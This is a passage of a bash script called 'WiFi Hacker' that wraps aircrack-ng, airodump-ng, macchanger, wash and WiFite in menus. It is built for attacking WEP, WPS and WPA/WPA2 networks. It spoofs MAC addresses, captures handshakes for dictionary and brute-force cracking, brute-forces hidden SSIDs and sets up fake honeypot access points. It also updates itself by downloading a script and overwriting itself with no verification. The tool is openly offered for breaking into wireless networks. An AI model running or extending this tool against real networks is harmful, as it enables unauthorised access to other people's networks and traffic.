Exit |" echo "--------------------- **************************************************************** ----------------------" $yellow echo "-------------------------------------------------------------------------------------------------------------------" echo "| Interfaces: $interfacesFound | Interface Mode: $interfaceMode | [A] Advanced | Sessions: [S] Save [L] Load | [E] Extras [H] Help |" echo "-------------------------------------------------------------------------------------------------------------------" #echo "" $white } bannerMain(){ currentTask="bannerMain" setWindowTitle clear $blue echo "--------------------- **************************************************************** ----------------------" echo "| [ ] | * WiFi Hacker v$versionBase / esc0rtd3w 2019 / github.com/esc0rtd3w * | [CTRL+C ] Exit |" echo "--------------------- **************************************************************** ----------------------" echo "-------------------------------------------------------------------------------------------------------------------" $yellow echo "| Interfaces: $interfacesFound | Interface Mode: $interfaceMode | [A] Advanced | Sessions: [S] Save [L] Load | [E] Extras [H] Help |" echo "-------------------------------------------------------------------------------------------------------------------" #echo "" $white } bannerMenu(){ currentTask="bannerMenu" setWindowTitle clear $blue echo "--------------------- **************************************************************** ----------------------" echo "| [ ] | * WiFi Hacker v$versionBase / esc0rtd3w 2019 / github.com/esc0rtd3w * | [CTRL+C ] Exit |" echo "--------------------- **************************************************************** ----------------------" $yellow echo "-------------------------------------------------------------------------------------------------------------------" echo "| Interfaces: $interfacesFound | Interface Mode: $interfaceMode | [A] Advanced | Sessions: [S] Save [L] Load | [E] Extras [H] Help |" echo "-------------------------------------------------------------------------------------------------------------------" #echo "" $white } bannerSlim(){ currentTask="bannerSlim" setWindowTitle clear $blue echo "--------------------- **************************************************************** ----------------------" echo "| [ ] | * WiFi Hacker v$versionBase / esc0rtd3w 2019 / github.com/esc0rtd3w * | [CTRL+C ] Exit |" echo "--------------------- **************************************************************** ----------------------" $white } bannerStats(){ currentTask="bannerStats" $cyan echo "-------------------------------------------------------------------------------------------------------------------" echo "Interface: $interfaceName / MAC: $macAddressMonitor / ESSID: $essid / BSSID: $bssid / Channel: $channel" echo "-------------------------------------------------------------------------------------------------------------------" echo "" $white } bannerExit(){ currentTask="bannerExit" sessionWriteEndCurrent sessionRemoveEmpty forceDisconnectWifi clear $blue echo "Thank You For Playing Fair ;)" echo "" echo "esc0rtd3w 2019" echo "" echo "" $cyan echo "View My Other Projects On GitHub:" echo "" echo "https://github.com/esc0rtd3w" echo "" echo "" exit } bannerExitUpdate(){ currentTask="bannerExitUpdate" clear $green echo "The WiFi Hacker Script Has Been Updated To Version $versionRemote" echo "" echo "The New Script Is Located At $initPath/$newVersionScript" echo "" echo "" echo "" echo "To launch the new script type the following two lines into this terminal WITHOUT QUOTES" echo "" echo "\"chmod a+x $newVersionScript\"" echo "" echo "\"./$newVersionScript\"" echo "" echo "" echo "" $blue echo "Thank You For Playing Fair ;)" echo "" echo "esc0rtd3w 2019" echo "" echo "" $cyan echo "View My Other Projects On GitHub:" echo "" echo "https://github.com/esc0rtd3w" echo "" echo "" exit } ############################################################################ # BANNERS END ########################################################## ############################################################################ ############################################################################ # GLOBAL TEXT BEGIN #################################################### ############################################################################ # Usage: doSleepMessage "message" "time" "color" # Usage Example: doSleepMessage "Please Wait...." "5" "$red" doSleepMessage(){ message="$1" time="$2" color="$3" currentTask="doSleepMessage" banner bannerStats $color echo "$message" sleep $time } ############################################################################ # GLOBAL TEXT END ###################################################### ############################################################################ ############################################################################ # UPDATE STUFF BEGIN ################################################### ############################################################################ checkForUpdates(){ currentTask="checkForUpdates" checkConnectionStatus # If a blank entry was made to skip update then this value should be 1 case "$skipUpdate" in "0") # If connection can connect to internet, check for update case "$ipStatus" in "1") menuUpdate ;; esac ;; esac } menuUpdate(){ currentTask="menuUpdate" # Check remote server for update version case "$updateChecked" in "0") # Make sure there is an active internet connection case "$ipStatus" in "1") checkUpdate ;; esac ;; esac # Set default choice updateChoice="" bannerSlim echo "" #echo "Update Menu" #echo "" #echo "" #echo "" # If remote version is not newer, then local version should be green case "$newUpdateAvailable" in "0") $green ;; "1") $yellow ;; "2") $magenta ;; esac echo "Local Version: v$versionBase" echo "" # If remote version is newer, then local version should not be green case "$newUpdateAvailable" in "0") $yellow ;; "1") $green ;; "2") $magenta ;; esac echo "Remote Version: v$versionRemote" $white echo "" echo "" echo "" echo "" echo "" echo "Choose an option and press ENTER:" echo "" echo "" echo "1) Check For New Update" echo "" echo "2) Apply New Update" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" $cyan echo "AUTOMATICALLY CONTINUING IN 10 SECONDS...." $white echo "" #read updateChoice read -t 10 updateChoice case "$updateChoice" in "") skipUpdate="1" returnToUpdatePage="0" #read pause ;; "1") # Reset updateChecked Flag updateChecked="0" returnToUpdatePage="1" checkUpdate ;; "2") case "$newUpdateAvailable" in # No Update Available / Remote Version Matches Local "0") returnToUpdatePage="0" banner $red echo "" echo "No Updates Are Available!" echo "" echo "" echo "" echo "" echo "" echo "" $cyan echo "Continuing To Main Menu In 5 Seconds...." echo "" echo "" read -t 5 noUpdateAvailable ;; # Update Is Available / Remote Version Is Higher Than Local "1") returnToUpdatePage="0" getUpdate ;; # Dev Build / Remote Version Is Lower Than Local "2") returnToUpdatePage="0" banner $magenta echo "" echo "You Have An Unreleased Developer Version" echo "" echo "" echo "" $green echo "" echo "* TO FORCE UPDATE FROM REMOTE VERSION PRESS \"F\" AND ENTER *" echo "" echo "" echo "" echo "" $cyan echo "Continuing To Main Menu In 10 Seconds...." echo "" echo "" read -t 10 noUpdateAvailable # Check for Forced Update Flag case "$noUpdateAvailable" in "F" | "f") returnToUpdatePage="0" getUpdate ;; esac ;; esac ;; "x" | "X") bannerExit ;; esac } checkUpdate(){ currentTask="checkUpdate" wget -O "$updateTemp" $updateMaster versionRemoteTemp=$(cat $updateTemp | grep versionBase= | cut -d "\"" -f2 | head -c 3) versionRemote="$versionRemoteTemp" case "$isDebugMode" in "1") echo "versionRemote: $versionRemote" read pause ;; esac cleanVersionNumbers compareUpdateVersions #echo "newUpdateAvailable: $newUpdateAvailable" #read pause rm $updateTemp updateChecked="1" case "$returnToUpdatePage" in "1") menuUpdate ;; esac } getUpdate(){ currentTask="getUpdate" # Get Base Script Name #newVersionScript=$(printf '%s\n' "${0##*/}") newVersionScript=$(basename -- "$0") # Download New Script wget -O "$initPath/$newVersionScript.tmp" $updateMaster #read pause # Make Backup of Original Script cp "$initPath/$newVersionScript" "$initPath/$newVersionScript.BACKUP" # Remove Old Script rm -f "$initPath/$newVersionScript" # Copy New Script cp "$initPath/$newVersionScript.tmp" "$initPath/$newVersionScript" # Remove Temp Script rm -f "$initPath/$newVersionScript.tmp" #read pause bannerExitUpdate } cleanVersionNumbers(){ currentTask="cleanUpdateVersion" versionBaseClean=$(echo $versionBase | sed -e 's/\.//') versionRemoteClean=$(echo $versionRemote | sed -e 's/\.//') #echo "Local Version: $versionBaseClean" #echo "Remote Version: $versionRemoteClean" #read pause } compareUpdateVersions(){ # Compare Local and Remote Versions (0 = Not Greater / 1 = Greater) (Not working?? 20170102) #versionCompare=$(echo "$versionBaseClean <= $versionRemoteClean" | awk '{print ($versionBaseClean <= $versionRemoteClean)}') if [ $versionRemoteClean -lt $versionBaseClean ]; then newUpdateAvailable="2" isDevBuild="1" fi if [ $versionRemoteClean -gt $versionBaseClean ]; then newUpdateAvailable="1" isDevBuild="0" fi if [ $versionRemoteClean -eq $versionBaseClean ]; then newUpdateAvailable="0" isDevBuild="0" fi } ############################################################################ # UPDATE STUFF END ##################################################### ############################################################################ ############################################################################ # OTHER MISC STUFF BEGIN ############################################### ############################################################################ checkRootStatus(){ userPriv="none" isRoot=$(whoami | grep root) case "$isRoot" in "root") userPriv="root" esac if [ "$userPriv" != "root" ]; then noRootAccess fi } noRootAccess(){ banner bannerStats $red echo "Yikes! No Root Access!" $white echo "" echo "" echo "I Currently Have Nothing Scripted To Handle This :(" echo "" echo "Please login as a root user and try again!" echo "" echo "" echo "Press ENTER to exit this script...." echo "" echo "" read pause bannerExit } checkConnectionStatus(){ ipStatus="0" ipStatusText="None" ipStatusTemp=$(ping -c 1 google.com | grep "1 received") ipStatus=$(echo "$ipStatusTemp" | cut -c1) case "$ipStatus" in "1") ipStatus="1" ipStatusText="Wifi" ;; esac case "$ipStatusText" in "None") ipStatus="0" ;; esac #echo "$ipStatusText" #read pause } fixAirmonCompat(){ #$terminal airmon-ng check kill& airmon-ng check kill& #airmon-ng check kill& } checkWifiandDisplayMessage(){ case "$ipStatusText" in "Wifi") banner echo "" echo "YOU MUST DISCONNECT FROM WIFI BEFORE CONTINUING!!!!" echo "" echo "" echo "PRESS ENTER TO RETURN TO MAIN MENU...." echo "" echo "" read pause menuMain ;; esac } # Tries fixing issues with connection staying persistant to WiFi forceDisconnectWifi() { #stopMonitorMode #killNetworkManager NetworkManager #disableChannelHopping enableChannelHopping } ############################################################################ # OTHER MISC STUFF END ################################################# ############################################################################ ############################################################################ # MENUS: MAIN BEGIN #################################################### ############################################################################ loadMenuHotkeys(){ case "$hotkeyInput" in "M" | "m") # Check for resetSpoofStatus Flag case "$resetSpoofStatus" in "1") spoofStatus="0" ;; esac killAll stopMonitorMode menuMain ;; "A" | "a") menuAdvanced ;; "S" | "s") checkForEmptyEncryptionType case "$bssid" in "") menuMain ;; esac if [ "$bssid" != "" ]; then menuSessionSave fi ;; "L" | "l") checkForEmptyEncryptionType menuSessionLoad ;; "H" | "h") menuHelp ;; "E" | "e") case "$lastMenuID" in "menuMain") menuMain ;; *) menuExtras ;; esac ;; "X" | "x") killAll stopMonitorMode bannerExit ;; esac } menuMain(){ currentTask="menuMain" lastMenuID="menuMain" # Create temp folder to use for text dumps, etc mkdir $whTemp checkRootStatus sessionCreatePaths sessionRemoveEmpty checkMultipleAdapters checkInterfaceMode checkConnectionStatus case "$ipStatus" in "1") banner echo "" echo "Loading Menu...." echo "" echo "" forceDisconnectWifi checkConnectionStatus sleep 3 menuMain ;; "0") banner echo "" #echo "Welcome to the WiFi Hacker script!" echo "Compatible with all WEP/WPA/WPA2/WPS protected WiFi routers." echo "" $red echo "**********************************************************************" echo "YOU MUST DISCONNECT FROM ANY WIRELESS CONNECTIONS BEFORE CONTINUING!!!" echo "**********************************************************************" echo "" case "$ipStatus" in "0") $green ;; "1") $red ;; esac echo "You are currently connected to: $ipStatusText" $white echo "" echo "" #$cyan echo "0) Auto Mode (Uses WiFite In Full Automatic Mode. Applies To All Encryption Types)" #$white echo "" echo "1) WEP Mode (Menu Options Can Be Selected To Easily Circumvent Any WEP Connection)" echo "" echo "2) WPS Mode (Pin Vulnerability Attack. May Also Have WPA, WPA2, or WEP Displayed)" echo "" echo "3) WPA Mode (Capture 4-way Handshake, Dictionary Attack, Bruteforce, Custom Wordlist, and More)" echo "" echo "4) WPA2 Mode (Identical To WPA Attacks, Except Target Encryption Type)" echo "" echo "" echo "" echo "Select a mode from above and press Enter:" echo "" read getMode hotkeyInput="$getMode" loadMenuHotkeys "$hotkeyInput" case "$getMode" in "") menuMain ;; "0") checkConnectionStatus checkWifiandDisplayMessage menuAttacksAllWifiteAuto menuMain ;; "1") checkConnectionStatus checkWifiandDisplayMessage mkdir $capturePathWEP encryptionType="wep" encryptionTypeText="WEP" checkSpoofStatus menuAuto ;; "2") checkConnectionStatus checkWifiandDisplayMessage mkdir $capturePathWPS encryptionType="wps" encryptionTypeText="WPS" checkSpoofStatus menuAuto ;; "3") checkConnectionStatus checkWifiandDisplayMessage mkdir $capturePathWPA encryptionType="wpa" encryptionTypeText="WPA" checkSpoofStatus menuAuto ;; "4") checkConnectionStatus checkWifiandDisplayMessage mkdir $capturePathWPA2 encryptionType="wpa2" encryptionTypeText="WPA2" checkSpoofStatus menuAuto ;; *) menuMain ;; esac ;; esac #menuMain } menuAuto(){ currentTask="menuAuto" lastMenuID="menuAuto" case "$encryptionTypeText" in "Empty") menuMain ;; esac #sessionCopyNewCaptureFiles sessionRemoveEmpty cleanTempScanResultsFile "all" checkInterfaceMode banner bannerStats $green echo "" echo "You are ready to begin the $encryptionTypeText attack!" echo "" $white case "$encryptionTypeText" in "WEP") echo "To perform a fully automated attack, type AUTOWEP end press ENTER" ;; "WPS") echo "To perform a fully automated attack, type AUTOWPS end press ENTER" ;; "WPA") echo "To perform a fully automated attack, type AUTOWPA end press ENTER" ;; "WPA2") echo "To perform a fully automated attack, type AUTOWPA2 end press ENTER" ;; esac echo "" echo "YOU MAY NOW OPTIONALLY PRESS THE \"W\" KEY ON KEYBOARD TO YOUR SPOOF MAC ADDRESS" echo "" echo "" echo "" echo "The next step will run an airodump-ng session in a new window." echo "" echo "Once you enter all required info, the new window will be closed" echo "" echo "" echo "" echo "Press ENTER to clear the current session and select a target...." echo "" echo "YOU MAY ALSO PRESS THE \"P\" KEY ON KEYBOARD TO LOAD PREVIOUS SESSION" echo "" read readyForAirodumpScan hotkeyInput="$readyForAirodumpScan" loadMenuHotkeys "$hotkeyInput" case "$readyForAirodumpScan" in "") killAll checkForEmptyEncryptionType # Run wash if WPS case "$encryptionTypeText" in "WPS") #$terminal wash -i $interfaceMonitor -o "$washFile" -C ;; esac autoModeNoPreviousSession ;; "P" | "p") checkForEmptyEncryptionType checkForEmptyCredentials "bssid" checkForEmptyCredentials "essid" checkForEmptyCredentials "channel" autoModeUsePreviousSession ;; "W" | "w") #returnTo="menuAuto" spoofMacAddress menuAuto ;; "autowep" | "AUTOWEP" | "AutoWEP" | "AutoWep" | "autoWEP" | "autoWep") menuAttacksWEPWifiteAuto ;; "autowps" | "AUTOWPS" | "AutoWPS" | "AutoWps" | "autoWPS" | "autoWps") menuAttacksWPSWifiteAuto ;; "autowpa" | "AUTOWPA" | "AutoWPA" | "AutoWpa" | "autoWPA" | "autoWpa") menuAttacksWPAWifiteAuto ;; "autowpa2" | "AUTOWPA2" | "AutoWPA2" | "AutoWpa2" | "autoWPA2" | "autoWpa2") menuAttacksWPA2WifiteAuto ;; *) menuAuto ;; esac #restartProcesses menuMain } menuAdvanced(){ currentTask="menuAdvanced" #lastMenuID="menuAdvanced" interface="None" banner bannerStats echo "" echo "SORRY I GOT LAZY AND NEVER CODED THIS MENU" echo "WILL BE AVAILABLE SOOOOOOOOOON!" echo "" echo "" echo "Advanced Menu" echo "" echo "" echo "1) Monitor Mode Options" echo "" echo "2) Honeypot Mode and Attacks" echo "" echo "" echo "" echo "" $green echo "** TO RETURN TO PREVIOUS PAGE JUST PRESS ENTER **" $white echo "" echo "" echo "" echo "" echo "Select an option and press ENTER:" echo "" echo "" read getAdvancedOptionMain hotkeyInput="$getAdvancedOptionMain" loadMenuHotkeys "$hotkeyInput" case "$getAdvancedOptionMain" in "") $currentTask #menuMain #menuAdvanced ;; *) $currentTask #menuMain #menuAdvanced ;; esac #restartProcesses $currentTask } menuExtras(){ #currentTask="menuExtras" #lastMenuID="menuExtras" banner bannerStats echo "1) Backup All Sessions and Capture Files (Full Backup of all saved files to ZIP file)" echo "2) Clean Capture Files (Removes all saved .cap, .xor, .ivs, .csv, and .netxml files)" echo "3) Clean Session Files (Removes all saved WEP, WPS, WPA, WPA2 *.sessions files)" echo "" echo "4) Change Active Terminal (Switch between Gnome, Konsole, X-Term, and User Selected)" echo "" echo "5) Start NetworkManager 6) Stop NetworkManager" echo "7) Enable wpa_supplicant 8) Disable wpa_supplicant" echo "9) Start wpa_cli 10) Stop wpa_cli" echo "" echo "11) Open Interface Options Menu" echo "" echo "12) Hidden SSID Options" echo "" echo "R) Return To Previous Menu" echo "" echo "" echo "Select an option from above and press ENTER:" echo "" read getExtras hotkeyInput="$getExtras" loadMenuHotkeys "$hotkeyInput" case "$getExtras" in "") menuExtras ;; "1") backupSessionFiles ;; "2") cleanCaptureFiles ;; "3") cleanSessionFiles ;; "4") menuChangeTerminal ;; "5") startNetworkManager ;; "6") killNetworkManager ;; "7") wpaSupplicantEnable ;; "8") wpaSupplicantDisable ;; "9") wpa_cli start ;; "10") wpa_cli terminate ;; "11") menuExtrasInterface ;; "12") banner bannerStats echo "1) Bruteforce Hidden SSID" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" $cyan echo "* Just Press ENTER To Return To Previous Menu *" echo "" echo "" $white echo "Select an option from above and press ENTER:" echo "" read ssidHiddenOption case "$ssidHiddenOption" in "1") bruteForceHiddenSSID ;; esac ;; "r" | "R") $lastMenuID ;; *) menuExtras ;; esac menuExtras } menuExtrasInterface(){ currentTask="menuExtrasInterface" #lastMenuID="menuExtrasInterface" banner bannerStats echo "" echo "1) Enable Channel Hopping: $interface" echo "2) Disable Channel Hopping: $interface" echo "" echo "3) Bring Up Interface: $interfaceMonitor" echo "4) Bring Down Interface: $interfaceMonitor" echo "" echo "5) Switch Interface To Managed" echo "6) Switch Interface To Monitor" echo "" echo "7) Fix Airmon Conflicting Processes" echo "" echo "8) Get \"ifconfig\" Output" echo "9) Get \"iwconfig\" Output" echo "" echo "R) Return To Previous Menu" echo "" echo "" echo "Select an option from above and press ENTER:" echo "" #echo "" read getExtrasInterface hotkeyInput="$getExtrasInterface" loadMenuHotkeys "$hotkeyInput" case "$getExtrasInterface" in "") menuInterface ;; "1") enableChannelHopping ;; "2") disableChannelHopping ;; "3") interfaceUp ;; "4") interfaceDown ;; "5") interfaceManaged ;; "6") interfaceMonitor ;; "7") fixAirmonCompat ;; "8") showIfConfig=$(ifconfig) banner bannerStats echo "" echo "$showIfConfig" echo "" echo "" echo "" echo "Press ENTER to continue..." echo "" echo "" read pause ;; "9") showIwConfig=$(iwconfig) banner bannerStats echo "" echo "$showIwConfig" echo "" echo "" echo "" echo "Press ENTER to continue..." echo "" echo "" read pause ;; "r" | "R") #$lastMenuID menuExtras ;; *) menuExtrasInterface ;; esac menuExtrasInterface } menuHelp(){ currentTask="menuHelp" #lastMenuID="menuHelp" banner bannerStats echo "" echo "*******************************************" echo "CURENTLY NOT WORKING!!!" echo "" echo "PRESS ENTER TO RETURN TO PREVIOUS MENU!" echo "*******************************************" echo "" echo "" echo "" echo "Welcome to the Help Section!" echo "" echo "" echo "" echo "CURRENTLY NOT AVAILABLE!" echo "" echo "" echo "" echo "" echo "" read getHelp hotkeyInput="$getHelp" loadMenuHotkeys "$hotkeyInput" case "$getHelp" in "") $lastMenuID #menuMain #menuHelp ;; *) $lastMenuID #menuMain #menuHelp ;; esac $lastMenuID } menuChangeTerminal(){ currentTask="menuChangeTerminal" #lastMenuID="menuChangeTerminal" banner echo "" echo "Select a new terminal to use" echo "" echo "" echo "Current Terminal: $terminal" echo "" echo "" echo "1a) Gnome Legacy: $terminalGnomeLegacy" echo "" echo "1b) Gnome: $terminalGnome" echo "" echo "2) Konsole: $terminalKonsole" echo "" echo "3) X-Term: $terminalXterm" echo "" echo "4) Custom (User Selected)" echo "" echo "5) Return To Previous Menu" echo "" echo "" read getTerminalType hotkeyInput="$getTerminalType" loadMenuHotkeys "$hotkeyInput" case "$getTerminalType" in "") menuChangeTerminal ;; "1a") terminal="$terminalGnomeLegacy" terminalText="GnomeLegacy" ;; "1b") terminal="$terminalGnome" terminalText="Gnome" ;; "2") terminal="$terminalKonsole" terminalText="Konsole" ;; "3") terminal="$terminalXterm" terminalText="Xterm" ;; "4") banner echo "" echo "Input a terminal string with arguments and press ENTER:" echo "" echo "" echo "Example: $terminalGnome" echo "" echo "" read newTerminal case "$newTerminal" in *) terminal="$newTerminal" terminalText="Custom" ;; esac ;; "5") menuExtras ;; *) menuChangeTerminal ;; esac menuMain } menuHoneyPotMode(){ currentTask="menuHoneyPotMode" initMonitorMode banner bannerStats echo "" echo "I Am HoneyPot Mode" echo "" echo "I Am Also Broken :(" echo "" echo "" echo "" echo "1) Use Airbase-ng" echo "" echo "2) Use Wifi-Honey" echo "" echo "3) Use a Custom Binary" echo "" echo "" echo "" echo "Select an option and press ENTER:" echo "" echo "" read getHoneyPotOptionMain hotkeyInput="$getHoneyPotOptionMain" loadMenuHotkeys "$hotkeyInput" case "$getHoneyPotOptionMain" in "") menuHoneyPotMode #$lastMenuID #menuMain #menuAdvanced ;; "1") getBSSID $terminal airbase-ng -a $bssid -i $interfaceMonitor -h $macAddressMonitor -v & ;; "2") getESSID getChannel $terminal wifi-honey $essid $channel $interfaceMonitor & ;; "3") echo "Custom Binary" read pause menuHoneyPotMode ;; *) menuHoneyPotMode #$lastMenuID #menuMain #menuAdvanced ;; esac #restartProcesses menuHoneyPotMode #$lastMenuID } selectFromApList(){ # Get AP Credential Type From 1st Argument apListType="$1" currentTask="selectFromApList" echo "Dumping Found AP Targets From airodump-ng Window...." echo "" echo "" case "$apListType" in "essid") sleep 15 cat "$defaultScanOutputXML" | grep "" ;; "channel") sleep 15 cat "$defaultScanOutputXML" | grep "" ;; esac echo "" echo "" $yellow echo "Select $apListType from found AP targets above and copy to clipboard (CTRL+SHIFT+C)" echo "" echo "" $white echo "You may also follow the instructions below to select a target" echo "" echo "" #read getApTarget } ############################################################################ # MENUS: MAIN END ###################################################### ############################################################################ ############################################################################ # MENUS: SESSIONS BEGIN ################################################ ############################################################################ menuSessionSave(){ # Not needed for this menu #currentTask="menuSessionSave" #lastMenuID="menuSessionSave" banner bannerStats echo "Session Save Menu" echo "" echo "" echo "" echo "" echo "" echo "Save As: $capturePath/$encryptionType/$encryptionType.sessions" echo "" echo "" echo "" echo "Press \"1\" and ENTER to save session file now" echo "" echo "" echo "You may also just press ENTER to return to the previous menu...." echo "" echo "" getSession="1" #read getSession hotkeyInput="$getSession" loadMenuHotkeys "$hotkeyInput" case "$getSession" in "") $currentTask ;; "1") sessionSave ;; *) $currentTask ;; esac $currentTask } menuSessionLoad(){ # Not needed for this menu #currentTask="menuSessionLoad" #lastMenuID="menuSessionLoad" banner bannerStats echo "Session Load Menu" echo "" echo "" echo "" echo "" echo "" echo "Current File Loaded: $capturePath/$encryptionType/$encryptionType.sessions" echo "" echo "" echo "" echo "Press \"1\" and ENTER to load session file now" echo "" echo "" echo "You may also just press ENTER to return to the previous menu...." echo "" echo "" getSession="1" #read getSession hotkeyInput="$getSession" loadMenuHotkeys "$hotkeyInput" case "$getSession" in "") $currentTask ;; "1") sessionLoad ;; *) $currentTask ;; esac $currentTask } ############################################################################ # MENUS: SESSIONS END ################################################## ############################################################################ ############################################################################ # GET CREDENTIALS BEGIN ################################################ ############################################################################ textGetTargetInfo(){ currentTask="textGetTargetInfo" echo "" echo "THERE SHOULD NOW BE A NEW TERMINAL WINDOW OPEN, ONLY SHOWING $encryptionTypeText TARGETS" echo "" echo "YOU CAN USE THIS AIRODUMP-NG WINDOW TO GATHER ALL NEEDED INFORMATION" echo "" echo "YOU CAN COPY AND PASTE (CTRL+SHIFT+C) (CTRL+SHIFT+V) TO ENTER TARGET INFO BELOW" echo "" #echo "YOU MAY NEED TO EXTEND THE WINDOW WIDER TO SEE THE ESSID NAMES" echo "YOU MAY PRESS \"T\" AT ANYTIME TO OPEN A TEXT VIEW OF AVAILABLE TARGETS" echo "" echo "" case "$encryptionTypeText" in "WPS") $green echo "WPS TARGETS MAY HAVE \"1.0, 1.0 LAB, DISP, KPAD\" OR ANOTHER VARIANT UNDER \"WPS\" COLUMN" echo "" echo "ALL TARGETS THAT SUPPORT WPS MAY ALSO HAVE \"OPN\", \"WEP\", \"WPA\", or \"WPA2\" UNDER \"ENC\" COLUMN" $white echo "" echo "" ;; "WEP") $green echo "WEP TARGETS MAY HAVE \"WEP\" UNDER THE \"ENC\" and \"CIPHER\" COLUMNS" #echo "CURRENTLY SET TO ONLY SCAN FOR \"WEP\" TARGETS" $white echo "" echo "" ;; "WPA") $green echo "WPA TARGETS MAY HAVE \"WPA\" UNDER THE \"ENC\" and \"CCMP\" UNDER \"CIPHER\" COLUMNS" $white echo "" echo "" ;; "WPA2") $green echo "WPA2 TARGETS MAY HAVE \"WPA2\" UNDER THE \"ENC\" and \"CCMP\" UNDER \"CIPHER\" COLUMNS" $white echo "" echo "" ;; esac } getESSID(){ currentTask="getESSID" banner bannerStats #selectFromApList essid textGetTargetInfo echo "PASTE or type the Target ESSID Here and press ENTER:" echo "" echo "Example: NETGEAR" echo "" echo "" $cyan read getESSIDTemp hotkeyInput="$getESSIDTemp" loadMenuHotkeys "$hotkeyInput" case "$getESSIDTemp" in "") getESSID ;; "t" | "T") cleanTempScanResultsFile "txt" openScanTargetsAsText getESSID ;; *) essid="$getESSIDTemp" ;; esac $white } getBSSID(){ currentTask="getBSSID" banner bannerStats #selectFromApList bssid textGetTargetInfo echo "PASTE or type the Target BSSID Here and press ENTER:" echo "" echo "Example: 00:11:22:33:44:55" echo "" echo "" $cyan read getBSSIDTemp hotkeyInput="$getBSSIDTemp" loadMenuHotkeys "$hotkeyInput" case "$getBSSIDTemp" in "") getBSSID ;; "t" | "T") cleanTempScanResultsFile "txt" openScanTargetsAsText getBSSID ;; *) bssid="$getBSSIDTemp" ;; esac $white } getChannel(){ currentTask="getChannel" banner bannerStats #selectFromApList channel textGetTargetInfo echo "PASTE or type the Target Channel Here and press ENTER:" echo "" echo "Example: 6" echo "" echo "" $cyan read getChannelTemp hotkeyInput="$getChannelTemp" loadMenuHotkeys "$hotkeyInput" case "$getChannelTemp" in "") getChannel ;; "t" | "T") cleanTempScanResultsFile "txt" openScanTargetsAsText getChannel ;; *) channel="$getChannelTemp" ;; esac $white } ############################################################################ # GET CREDENTIALS END ################################################## ############################################################################ ############################################################################ # MAC ADDRESS STUFF BEGIN ############################################## ############################################################################ getMacAddress(){ currentTask="getMacAddress" macAddress=$(ip link show $interface | tail -n 1 | cut -f 6 -d " ") } getMacAddressMonitor(){ currentTask="getMacAddressMonitor" macAddressMonitor=$(ip link show $interfaceMonitor | tail -n 1 | cut -f 6 -d " ") case "$isDebugMode" in "1") echo "interface: $interfaceMonitor" echo "mac: $macAddressMonitor" read pause ;; esac } setMacAddress(){ currentTask="setMacAddress" ifconfig $interface down macchanger -m $getNewMacAdressTemp $interface ifconfig $interface up spoofStatus="1" macAddress="$getNewMacAdressTemp" } setMacAddressMonitor(){ currentTask="setMacAddressMonitor" ifconfig $interfaceMonitor down macchanger -m $getNewMacAdressTemp $interfaceMonitor ifconfig $interfaceMonitor up spoofStatus="1" macAddressMonitor="$getNewMacAdressTemp" } getRandomMacAddress(){ currentTask="getRandomMacAddress" ifconfig $interface down macchanger -r $interface ifconfig $interface up spoofStatus="1" getMacAddress #macAddress="$getNewMacAdressTemp" } getRandomMacAddressMonitor(){ currentTask="getRandomMacAddressMonitor" ifconfig $interfaceMonitor down macchanger -r $interfaceMonitor ifconfig $interfaceMonitor up spoofStatus="1" getMacAddressMonitor #macAddressMonitor="$getNewMacAdressTemp" } spoofMacAddress(){ currentTask="spoofMacAddress" #lastMenuID="spoofMacAddress" # Setting resetSpoofStatus Flag for global hotkey compatibility resetSpoofStatus="1" banner bannerStats echo "" echo "To choose a random MAC Address, press the \"R\" key and press ENTER" echo "" echo "" echo "Enter the New MAC Address and press ENTER:" echo "" echo "Example: 00:11:22:33:44:55" echo "" echo "" read getNewMacAdressTemp hotkeyInput="$getNewMacAdressTemp" loadMenuHotkeys "$hotkeyInput" case "$getNewMacAdressTemp" in "") spoofMacAddress ;; "R" | "r") getRandomMacAddress getRandomMacAddressMonitor #$returnTo ;; *) setMacAddress setMacAddressMonitor #$returnTo ;; esac } checkSpoofStatus(){ case "$spoofStatus" in "0") #blank="" initMonitorMode ;; esac } ############################################################################ # MAC ADDRESS STUFF END ################################################ ############################################################################ ############################################################################ # MONITOR MODE STUFF BEGIN ############################################# ############################################################################ initMonitorMode(){ currentTask="initMonitorMode" #killProcesses stopMonitorMode disableChannelHopping enableChannelHopping getWirelessInterfaces banner initMon="" case "$initMon" in "") getMacAddress setMonitorMode getMacAddressMonitor #getWirelessInterfaces "refresh" ;; *) getMacAddress setMonitorMode getMacAddressMonitor #getWirelessInterfaces ;; esac } setMonitorMode(){ currentTask="setMonitorMode" #interfaceMonitor="mon0" #echo "$interface" #read pause $startMonitorMode $interface } stopMonitorMode(){ currentTask="stopMonitorMode" killMsg="Killing all active previous monitor mode interfaces...." # Older style airmon-ng killMonA="mon" # Newer 1.2+ style airmon-ng killMonB1="wlan" killMonB2="mon" killCounter="0" # I just selected 12 as a number that I feel nobody would have more wifi adapters than #killCounterMax="12" # Using number of found adapters to determine max killCounterMax="$interfacesFound" # Initial mon0 or wlan0mon before loop case "$killCounter" in "0") banner $white echo "" echo $killMsg $red $stopMonitorMode $killMonA$killCounter $stopMonitorMode $killMonB1$killCounter$killMonB2 ;; esac while [ $killCounter -le $killCounterMax ] do banner $white echo "" echo $killMsg $red $stopMonitorMode $killMonA$killCounter $stopMonitorMode $killMonB1$killCounter$killMonB2 killCounter=$(($killCounter+1)) done banner $white } ############################################################################ # MONITOR MODE STUFF END ############################################### ############################################################################ ############################################################################ # ATTACKS: GLOBAL BEGIN ################################################ ############################################################################ autoModeUsePreviousSession(){ currentTask="autoModeUsePreviousSession" sessionCopyNewCaptureFiles case "$encryptionType" in "wep") autoModeUsePreviousSessionWEP ;; "wps") autoModeUsePreviousSessionWPS ;; "wpa") autoModeUsePreviousSessionWPA ;; "wpa2") autoModeUsePreviousSessionWPA2 ;; esac } autoModeNoPreviousSession(){ currentTask="autoModeNoPreviousSession" case "$encryptionType" in "wep") autoModeNoPreviousSessionWEP ;; "wps") autoModeNoPreviousSessionWPS ;; "wpa") autoModeNoPreviousSessionWPA ;; "wpa2") autoModeNoPreviousSessionWPA2 ;; esac } adFileDump(){ noChannel="$1" #echo "$noChannel" #read pause currentTask="adFileDump" echo "" echo "" case "$encryptionType" in "wep") disableChannelHopping case "$noChannel" in "0") $terminal airodump-ng $interfaceMonitor --bssid $bssid --channel $channel --write "dump_$essid" #$terminal airodump-ng -w "dump_$essid" --bssid $bssid --channel $channel -i $interfaceMonitor & #$terminal airodump-ng --ignore-negative-one -w "dump_$essid" --bssid $bssid --channel $channel -i 